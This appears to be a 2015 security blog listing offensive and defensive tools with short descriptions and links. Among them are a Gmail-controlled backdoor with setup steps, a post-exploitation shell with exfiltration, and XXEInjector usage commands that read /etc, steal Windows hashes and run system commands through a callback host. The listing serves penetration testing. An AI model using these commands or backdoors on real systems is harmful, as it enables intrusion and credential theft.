Jun 20, 2015

Tools: PowerShell Script for detet Kerberos Golden Ticket by Microsoft

In unique situations it is possible for a malicious person-who has already compromised a computer using social methods-to craft a Kerberos ticket granting ticket. This ticket granting ticket can then be used to request service tickets in the domain environment and those service tickets could then be passed to services for authorization.
Though very rare, these attacks are possible and difficult to detect. This PowerShell script is designed to query through the Kerberos ticket caches on a computer and look for Ticket Granting Tickets which have a duration (lifetime) that is different than the 10 hour default or the script-running user's specified duration 

Source:: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285

Tools: SQLMap - WebGUI

Before anything, this project wouldn't even be possible without the awesome development team behind SQLMAP - hats off to them!
This is a PHP Frontend I made to work with the SQLMAP JSON API Server (sqlmapapi.py) to allow for a Web GUI to drive near full functionality of SQLMAP!
Here is a few quick videos I made to show that almost all of your usual SQLMAP command line functionality is still possible via this Web GUI.
Demo against: Windows 2003 Server, IIS/6.0 + ASP + MS-SQL 2005
Demo against: Linux (CentOS), Apache, MySQL, PHP
Blog Write-Up: http://kaoticcreations.blogspot.com/
Requirements:
  • Linux, Apache, PHP (check your favorite distro's wiki or forum pages, or use google)
    • PHP 5.3+ is suggested, older versions not tests so mileage may vary
  • Python and any SQLMAP dependencies (refer to their wiki for any help there)
  • Clone this repo to your machine
    • Edit the sqlmap/inc/config.php file so the paths all point to the right locations on your system
    • Copy the entire sqlmap/ directory and contents to your web root directory (cd SQLMAP-Web-GUI && cp -R sqlmap/ /var/www/)
    • When you want to use, simply fire up the sqlmap API server (python /home/user/tools/sqlmap/sqlmapapi.py -s)
    • Then you can navigate to the Web GUI address in your Browser to begin (firefox http://127.0.0.1/sqlmap/index.php)

Source:: https://github.com/Hood3dRob1n/SQLMAP-Web-GUI

Tools: Linux Post Exploitation

Linux post exploitation enumeration and exploit checking tools

Source:: https://github.com/reider-roque/linpostexp

CheatSheet: Security CheatSheet - A collection of cheatsheets for various infosec tools and topics.

These security cheatsheets are part of a project for the Ethical Hacking and Penetration Testing course offered at the University of Florida. Expanding on the default set of cheatsheets, the purpose of these cheatsheets are to aid penetration testers/CTF participants/security enthusiasts in remembering commands that are useful, but not frequently used. Most of the tools that will be covered have been included in our class and are available in Kali Linux.

Source:: https://github.com/Snifer/security-cheatsheets

Jun 18, 2015

Tools: Gcat - A stealthy Backdoor that uses Gmail as a command and control server

A stealthy Python based backdoor that uses Gmail as a command and control server.
Setup
For this to work you need:
  • A Gmail account (Use a dedicated account! Do not use your personal one!)
  • Turn on "Allow less secure apps" under the security settings of the account
This repo contains two files:
  • gcat.py a script that's used to enumerate and issue commands to available clients
  • implant.py the actual backdoor to deploy
In both files, edit the gmail_user and gmail_pwd variables with the username and password of the account you previously setup.
You're probably going to want to compile implant.py into an executable using Pyinstaller
 

Tools: Keyjacker - Enumerates Mac keychains and displays plain text passwords.


Source:: https://github.com/erran/keyjacker

Tools: VBS-Obfuscator - VBScript obfuscation to allow PenTesters bypass countermeasures

VBScript obfuscation to allow PenTesters bypass countermeasures.

Source:: https://github.com/kkar/VBS-Obfuscator-in-Python

Jun 17, 2015

Tools: Poet - A simple POst-Exploitation Tool.

The client program runs on the target machine and is configured with an IP address (the server) to connect to and a frequency to connect at. If the server isn't running when the client tries to connect, the client quietly sleeps and tries again at the next interval. If the server is running however, the attacker gets a control shell to control the client and perform various actions on the target including:
  • reconnaissance
  • remote shell
  • file exfiltration
  • download and execute
  • self destruct

Source:: https://github.com/mossberg/poet

Jun 15, 2015

Tools: XXEInjector - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods.

XXEinjector by Jakub Palaczynski
XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications.
Options:
--host Mandatory - our IP address for reverse connections. (--host=192.168.0.2)
--file Mandatory - File containing valid HTTP request with xml. You can also mark with "XXEINJECT" a point where DTD should be injected. (--file=/tmp/req.txt)
--path Mandatory if enumerating directories - Path to enumerate. (--path=/etc)
--brute Mandatory if bruteforcing files - File with paths to bruteforce. (--brute=/tmp/brute.txt)
--oob Out of Band exploitation method. FTP is default. FTP can be used in any application. HTTP can be used for bruteforcing and enumeration through directory listing in Java < 1.7 applications. Gopher can only be used in Java < 1.7 applications. (--oob=http/ftp/gopher)
--direct Use direct exploitation instead of out of band. Unique mark should be specified as a value for this argument. This mark specifies where results of XXE start and end. Specify --xml to see how XML in request file should look like. (--direct=UNIQUEMARK)
--phpfilter Use PHP filter to base64 encode target file before sending.
--enumports Enumerating unfiltered ports for reverse connection. Specify value "all" to enumerate all TCP ports. (--enumports=21,22,80,443,445)
--hashes Steals Windows hash of the user that runs an application.
--expect Uses PHP expect extension to execute arbitrary system command. Best works with HTTP and PHP filter. (--expect=ls)
--upload Uploads specified file using Java jar schema into temp file. (--upload=/tmp/upload.txt)
--xslt Tests for XSLT injection.
--ssl Use SSL.
--proxy Proxy to use. (--proxy=127.0.0.1:8080)
--httpport Set custom HTTP port. (--httpport=80)
--ftpport Set custom FTP port. (--ftpport=21)
--gopherport Set custom gopher port. (--gopherport=70)
--jarport Set custom port for uploading files using jar. (--jarport=1337)
--xsltport Set custom port for XSLT injection test. (--xsltport=1337)
--urlencode URL encode injected DTD. This is default for URI.
--nodtd If you want to put DTD in request by yourself. Specify "--dtd" to show how DTD should look like.
--timeout Timeout for receiving file/directory content. (--timeout=20)
--fast Skip asking what to enumerate. Prone to false-positives.
--verbose Show verbose messages.
Example usage:
Enumerating /etc directory in HTTPS application:
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl
Enumerating /etc directory using gopher for OOB method:
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
Bruteforcing files using HTTP out of band method:
ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http
Enumerating using direct exploitation:
ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
Enumerating unfiltered ports:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
Stealing Windows hashes:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes
Uploading files using Java jar:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
Executing system commands using PHP expect:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls
Testing for XSLT injection:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt
Source::  https://github.com/enjoiz/XXEinjector

Tools: Apktool - A tool for reverse engineering Android apk files

Source: http://code.google.com/p/android-apktool/
Links

Tools: REIDE - A reverse engineering IDE for linux

A reverse engineering IDE for linux

Source:: https://github.com/SuppenGeist/REIDE